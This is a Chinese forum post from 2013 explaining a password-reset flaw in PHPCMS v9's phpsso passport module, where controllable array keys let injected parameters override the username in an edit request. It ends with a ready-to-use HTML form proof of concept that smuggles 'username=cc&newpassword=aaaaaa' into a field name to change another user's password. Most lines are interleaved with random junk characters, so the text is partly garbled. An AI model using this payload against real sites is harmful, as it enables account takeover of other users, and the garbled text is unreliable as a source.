提到的通行证的代码:7 a6 u1 ^8 Q& c8 ^. k
! G/ B( R4 K" K; C# K& k- U% r9 n1 m+ l& h6 U7 q
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
( a* L' i1 `% H+ v* z! {# }4 ^: O3 p3 o$ z) X6 @% \9 B& m
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。0 K( ^- [+ ?4 ]& X% [# x" b
' l5 E" Q# {8 H% Q) C( R
我把它留给了你们。. H6 a, P! q+ V3 i- F# y1 w A
不知道你们发现了它没有。
$ E" @5 u# U0 N2 w7 {$ h0 z, |1 _) K6 L4 t3 p/ \
我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。3 l# q1 [& y9 H2 y$ {4 o7 k7 B* Q( _
* {" O! j( @, m所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。# z1 x4 |" N5 m4 d1 i# [
0 }- T# u8 Q, [+ B) V" E! h
也就是* M% Z, w3 x2 U: E
" _' _+ |7 z; _
username=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。
8 E. p7 l7 L; y8 S" _8 R3 c/ o' q% T9 O- Y6 F% \+ p+ t
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。. U+ F: A% a3 l* B( T
4 }! V1 P5 ~0 E: d9 t5 H) H9 a+ W* e
其实我们有这样的机会,看看代码,如下:8 W$ w1 ?& n) g4 ?
$ ]# r Q6 M, O5 e: H) G7 ~
4 V" c4 W8 O- ~6 X& I x
public function auth_data($data) { q% O5 {9 u- Q4 R4 d. @
$s = $sep = '';
) l4 q5 H5 D0 t7 R b0 C9 u foreach($data as $k => $v) {
U3 b2 `; q5 g. ` if(is_array($v)) {
" _0 Y0 U6 o2 J6 g; K3 C0 F0 w" [ $s2 = $sep2 = '';5 v& B3 [! w( r
foreach($v as $k2 => $v2) {
4 p5 J6 n, W0 }; ^. I $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);
6 X/ i6 J) a/ q0 K; R1 J. e9 p $sep2 = '&';, U% g1 `6 G' U, w
}1 i$ b& `5 V- [
$s .= $sep.$s2;* E, P9 i1 f x7 Y
} else {- @: @2 V* C7 K1 C9 G( H1 x
$s .= "$sep$k=".$this->_ps_stripslashes($v);1 i* n% ^ z' e/ F
}/ f8 q: ~5 }; F: |; S
$sep = '&';! `+ c( J' _2 `
}$ y4 b; j0 T3 u2 U
) ]& w; ^0 q2 u9 z, l9 x6 ? $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));4 _) U. L7 A% p$ ^8 L( ]& G2 d
return $auth_s;
8 g9 K! L' ^$ Q5 b4 h, I+ E }
8 R$ A2 a2 o! R( q
$ v& X$ c" X6 G0 z. t' f" `可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。
" k! a. J) y; E5 ~% m/ h+ v1 X) ~8 P
, Z7 S# J6 s( V% K1 L举个例子
( w. o' E4 V# R3 z7 z+ |3 z5 Y i6 l: X, ~) d, @3 C8 h6 ^
$a[aaa=a&bbb] = 'a';
( U6 @1 f* ~0 q# |8 S
5 u- \# e9 C/ [6 a# }* M会变成aaa=a&bbb=a! F8 C4 S: \; A8 L- g0 `
! ]: _; X; E7 i
明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。3 B4 O) C- @9 A. E4 ]7 {
0 K4 s3 E6 a- y; m1 Y
这个时候,我们可以再去看一个函数。" T) S6 f1 G. k/ t, U
/ u$ E; _7 v1 o6 S* n就在这个文件内:
* w6 Z. r$ h% t: Z0 P; X2 F: @. J, q. x1 n
) {* K: s6 w V, @public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
' y: i) f0 U2 r+ S9 j2 S if($email && !$this->_is_email($email)) {. o$ a3 W5 l$ }0 s# B: e; \) q& b
return -4;
, b2 G4 D% ~) ^% M- }% t }
: x7 |5 p8 G' ^+ P. ^1 r4 X2 L return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
; J% M( M3 Z: v/ |( x1 T }. a$ ]3 {2 r7 \5 z m$ \# B+ G
8 q+ W0 h. t% u. {6 S9 [这是向通行证发了这样一个请求。# p# g) S9 Z" W) h- H
0 j0 K5 U* S4 e* K6 X4 Z$ S
我们再跟到通信证代码里去看看,就会有所发现。
- ?7 ]1 _" l6 T+ b( t* r; T; X4 `& U. f- @
% ]% L2 v- D$ C9 b; g# c2 Y+ P
public function edit() {3 {0 h9 V+ R9 u/ E" l
//能省就省,太长了不是吗?
+ z. p. W7 [2 D6 M- I4 P) |! G5 x! Z: V4 \0 ?$ w9 [! r4 N; f7 `1 U: H
if($this->username) {
6 i9 j! m5 ~3 s3 y1 J8 e+ r//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。 L: ^) q" N1 t. B" H
$res = $this->db->update($data, array('username'=>$this->username));6 {& E; e5 b: _9 y! d- m
} else {- B8 `5 a8 F) O6 [9 H( C
file_put_contents('typeb.txt',print_r($data,1).$this->uid);
- t _) s% A6 t$ z$ V% c $res = $this->db->update($data, array('uid'=>$this->uid));' V: w* o5 W+ _. h8 T
}
7 F7 p: |4 P/ v! L' E0 Z$ R
' m1 e* K8 k6 }- K7 j好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:( H! C7 r( N' ~
) o+ B1 ^1 q, O2 t
public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
" f$ d1 j9 a. |
4 S9 F4 [3 ?( K& h1 h+ O- C' b很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
1 I1 T/ ?; a" M. K1 X1 a
3 @3 s7 C! \) L' u我当然找到了:
. s0 u% E3 @' Ephpcms9/phpcms/modules/member/index.php
) i. q7 ~5 I+ ?, b' f5 x8 N
' P* {% a3 l' \* V, \# U$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);
0 t8 ?, v/ }+ T4 \5 V, V7 ^2 o: z: H S6 c7 J9 a
然后就没有然后了。
7 ^- o3 c( `, T' `9 }' p9 r
6 p7 c# A( T7 j4 m) P a5 `<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">+ h1 k" a/ T/ M. a* v6 X
<table width="100%" cellspacing="0" class="table_form"> G. _& g$ E3 N6 o
<tr>) b6 z" [. {7 A. M" ~4 S
<th width="80">邮箱:</th> 6 W) U& A; U: f# F
<td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>) z7 I. N% [6 P h$ k
</tr>
- n* Y$ A+ j" A7 C4 v( e <tr>
! d' j% U4 S. v% S0 v <th width="80">原密码:</th>
" |: \% f) g- C5 V9 q* H <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>% s, s& @9 L3 }" L( D
</tr>
3 [' u" u6 Q; L1 I$ T <tr>. S4 k4 {3 Q6 }! S* z" l
<th>新密码:</th>& ?* M; t; Z- Z9 t0 H& h6 ]
<td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td># l# w/ o5 m( z1 U c
</tr>' s; k8 k# q5 Y
<th></th>. t8 m- G$ S" ^$ v: Y$ ^
<td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>* \, F5 q& Y4 ~
</tr>
' q" A+ g) d* v2 e: a: m </table>/ [1 T c# S9 Q
4 u) I& C5 O5 r, }& X4 x8 d$ l7 K' n4 B
- E0 T: J* Q7 q' I% \! X </form>
2 T# K2 u% n+ C: L |
发表于 2013-2-23 14:46:35
收藏
支持
反对